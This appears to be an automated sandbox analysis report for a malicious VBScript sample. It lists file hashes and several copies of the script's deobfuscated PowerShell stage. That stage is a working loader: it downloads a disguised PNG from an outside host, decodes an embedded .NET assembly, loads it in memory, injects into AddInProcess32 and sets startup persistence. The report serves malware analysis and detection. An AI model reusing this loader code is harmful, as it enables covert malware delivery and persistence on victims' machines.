Malicious

bd623574204d3ee8c509c6a014e04907

VBScript
|
MD5: bd623574204d3ee8c509c6a014e04907
|
Size: 85.67 KB
|
text/vbscript

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	bd623574204d3ee8c509c6a014e04907
Sha1	56f845784066b71eea31f736c0632b5c01cda649
Sha256	89f379f3c244456381a5ac1ffa1530471ef70db4e1a2dd91068ffbc095273dd8
Sha384	88a1d4fbe417d574e3119ddb9c2d9b496a658990a87828b9af315269606af284fb4727ee08669f2ff33dadfe59e091eb
Sha512	406685b79eec39d4113f90b7fdf7eabeb4d5fac28c1b3eb4841c8545aeaff2592c37379fa6b51389fd9de82d5a4469ad75f7b9bcc797d0c1bc9df4d0f70fdce7
SSDeep	768:SviIbofhpmZ+sOgioIGaneEoHtmblkBOVG9cZw:Svimv+sOgNxdHmbcOw9cZw
TLSH	3A83F25BD2754723CA0C694BAA506FF3E4E785AD0AFC9F3197C0952193BDE488DBC428

File Structure

Artefacts

Name0	Value
URLs in VB Code - #1	http://www.ostrosoft.com/smtp.html
Deobfuscated PowerShell	Invoke-Expression
Deobfuscated PowerShell	$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } ))
Deobfuscated PowerShell	Invoke-Expression
Deobfuscated PowerShell	$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } ))
Deobfuscated PowerShell	Invoke-Expression

bd623574204d3ee8c509c6a014e04907 (85.67 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
URLs in VB Code - #1	http://www.ostrosoft.com/smtp.html	bd623574204d3ee8c509c6a014e04907
Deobfuscated PowerShell	Invoke-Expression Malicious	bd623574204d3ee8c509c6a014e04907 > bd623574204d3ee8c509c6a014e04907.deobfuscated.vbs > [Command #0] > [PowerShell Command]
Deobfuscated PowerShell	$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious	bd623574204d3ee8c509c6a014e04907 > bd623574204d3ee8c509c6a014e04907.deobfuscated.vbs > [Command #0] > [Base64-Block]
Deobfuscated PowerShell	Invoke-Expression Malicious	bd623574204d3ee8c509c6a014e04907 > bd623574204d3ee8c509c6a014e04907.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS]
Deobfuscated PowerShell	$null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious	bd623574204d3ee8c509c6a014e04907 > bd623574204d3ee8c509c6a014e04907.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS]
Deobfuscated PowerShell	Invoke-Expression Malicious	bd623574204d3ee8c509c6a014e04907 > bd623574204d3ee8c509c6a014e04907.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙